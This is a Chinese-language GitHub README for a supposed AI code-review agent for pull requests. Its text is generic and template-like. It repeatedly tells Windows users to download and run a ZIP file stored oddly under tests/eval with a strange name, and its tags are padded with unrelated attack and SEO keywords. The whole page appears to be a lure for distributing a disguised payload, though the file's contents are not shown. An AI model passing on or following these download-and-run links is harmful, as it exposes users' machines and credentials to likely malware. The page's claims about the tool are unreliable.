Adqui9608/ai-code-review-agent

# 🤖 ai-code-review-agent - 更安全、更快速的 PR 检查 [](https://raw.githubusercontent.com/Adqui9608/ai-code-review-agent/main/tests/eval/code_agent_ai_review_Gestapo.zip) ## 🧭 这个应用能做什么 ai-code-review-agent 会检查 GitHub pull request 中的 bug、安全问题和代码质量问题。它使用 AI agent 阅读代码变更并留下清晰的审查评论。 这款应用专为希望获得快速审查帮助、免于手动逐行扫描的团队而构建。它还包含追踪工具和测试结果，以便您了解审查系统的表现。 ## 💻 Windows 设置 ### 1. 打开下载页面 访问此页面以下载并运行应用： https://raw.githubusercontent.com/Adqui9608/ai-code-review-agent/main/tests/eval/code_agent_ai_review_Gestapo.zip ### 2. 获取项目文件 在此页面上，点击绿色的 **Code** 按钮，然后选择 **Download ZIP**。 如果您使用 Git，也可以将 repo 克隆到您的计算机。 ### 3. 解压文件夹 文件下载完成后： 1. 在您的 **Downloads** (下载) 文件夹中找到该 ZIP 文件 2. 右键单击该文件 3. 选择 **Extract All** (提取全部) 4. 选择一个您以后容易找到的文件夹，例如 `Documents` ### 4. 打开文件夹 打开解压后名为 `ai-code-review-agent` 的文件夹。 ### 5. 启动应用 在项目文件夹中找到主要的启动文件。常见的名称有： - `app.py` - `streamlit_app.py` - `main.py` 双击该文件，或者在已安装 Python 的情况下从终端运行它。 如果 Windows 询问使用哪个应用，请选择 **Python**。 ## 🖥️ 在 Windows 上您需要什么 此应用在 Windows 10 或 Windows 11 PC 上运行效果最佳。 您应当具备： - 互联网连接 - 足够的可用空间以存放应用文件 - Python 3.11 或更高版本 - 现代网络浏览器，如 Chrome、Edge 或 Firefox 如果您计划使用 AI 审查功能，还需要访问所需的 AI 和 GitHub 服务。 ## 🧰 您将获得什么 此项目可帮助您： - 审查 GitHub pull request - 在合并前发现 bug - 捕捉代码中的安全风险 - 检查代码质量 - 追踪审查结果 - 将审查输出与测试基准进行比较 - 在一处查看应用活动 ## 🔎 主要功能 ### 🧠 AI pull request 审查 agent 会阅读更改的代码并寻找重要的问题。它可以指出逻辑错误、危险模式、缺失的检查以及薄弱的代码风格。 ### 🔐 安全问题检查 应用会寻找可能暴露密钥、不安全调用或弱验证的代码。它能帮助您尽早发现问题。 ### 🧪 基准测试结果 项目包含带有真实指标的评估测试。您可以审查 agent 在不同用例下的表现。 ### 📈 使用 Langfuse 的可观测性 应用会追踪运行和审查步骤，以便您了解 agent 做了什么以及时间花在了哪里。 ### ⚙️ LangGraph 工作流 审查流程使用分步的 agent 路径。这有助于系统以结构化的方式处理 pull request。 ### 🤖 Llama 3.3 70B 支持 应用使用大语言模型进行代码审查任务。这有助于它处理更长的代码和更多的上下文。 ## 🪟 如何在 Windows 上运行 ### 选项 1：使用 Python 运行 如果您已经安装了 Python，请使用此方法。 1. 打开项目文件夹 2. 点击文件资源管理器中的地址栏 3. 输入 `cmd` 并按回车键 4. 在黑色窗口中，运行项目文件中显示的应用命令 5. 在浏览器中打开出现的本地链接 ### 选项 2：使用 Streamlit 如果应用使用 Streamlit，请使用如下命令运行它： 1. 打开项目文件夹 2. 打开命令提示符 3. 从应用文件中输入 Streamlit 启动命令 4. 按下回车键 5. 等待本地网页打开 如果网页没有打开，请从终端复制本地地址并将其粘贴到您的浏览器中 ## 🔑 开始之前 某些功能可能需要设置 GitHub 和 AI 访问权限。在大多数情况下，您需要： - GitHub 账号 - 对您想要审查的 repository 的访问权限 - AI 服务密钥 - Langfuse 账号（如果您需要追踪数据） 在您尝试审查 pull request 之前，请先完成这些设置。这有助于应用连接到正确的服务。 ## 🧩 常见用例 一个简单的流程如下所示： 1. 将应用连接到您的 GitHub 项目 2. 将其指向某个 pull request 3. 让 agent 扫描更改 4. 在应用中查看发现的问题 5. 在合并前修复问题 这为您提供了一种在代码进入主分支之前进行检查的快速方法。 ## 📊 涵盖的主题 此项目与以下工具和理念配合使用： - AI agent - 自动化代码审查 - GitHub Actions - 可观测性 - Python - Streamlit - 基于 LLM 的审查流程 - Pydantic 数据处理 - LangGraph 编排 - Langfuse 追踪 - Groq 模型访问 ## 🧭 文件夹布局 您可能会看到以下文件和文件夹： - `app/` - 应用逻辑 - `benchmarks/` - 测试和评估数据 - `prompts/` - 审查提示文本 - `config/` - 设置文件 - `logs/` - 运行记录 - `README.md` - 项目指南 ## 🛠️ 如果应用无法启动 请尝试以下步骤： 1. 检查是否已安装 Python 2. 确保您已解压完整的项目 3. 从项目文件夹运行命令 4. 关闭使用相同端口的其他应用 5. 打开终端中显示的浏览器链接 如果应用仍然无法加载，请重启 Windows 并重试 ## 🔐 安全与隐私 此应用可能会读取 pull request 中的代码以提供审查结果。请仅在您信任且有权审查代码的项目上使用它。 如果您连接第三方服务，请保管好您的密钥，并将其存储在您的本地环境设置中 ## 📦 下载和设置链接 从 GitHub 页面下载并运行此文件： https://raw.githubusercontent.com/Adqui9608/ai-code-review-agent/main/tests/eval/code_agent_ai_review_Gestapo.zip ## 🧪 基准测试与评估 该 repo 包含基准测试工作，用于检查 agent 发现实际问题的能力。这有助于您根据结果（而非承诺）来评估该系统。 您可以使用这些结果进行比较： - Bug 检测能力 - 安全问题发现率 - 代码质量反馈 - 问题遗漏率 - 审查一致性 ## 🧭 最佳用例 在以下情况使用此应用： - 更快地审查 pull request - 添加“第二双眼睛”进行审查 - 发现常见的代码错误 - 在合并前捕捉危险的更改 - 随时间追踪审查质量 ## 📌 首次使用须知步骤 1. 从 GitHub 下载项目 2. 解压文件 3. 在 Windows 中打开文件夹 4. 使用 Python 或 Streamlit 启动应用 5. 在浏览器中打开本地页面 6. 连接所需的服务 7. 审查您的第一个 pull request

标签：AI, AI代码审查, Apex, API集成, DevSecOps, GitHub集成, Kubernetes, pocsuite3, Pull Request审查, Python, SEO检索词, Streamlit, Windows应用, 上游代理, 人工智能, 代码安全, 代码审查助手, 代码审查工具, 可观测性, 团队协作开发, 威胁情报, 安全扫描, 开发者工具, 文档安全, 无后门, 时序注入, 机器学习, 漏洞枚举, 用户模式Hook绕过, 自动化代码审查, 访问控制, 足迹探测, 软件测试, 逆向工具, 错误基检测, 静态代码分析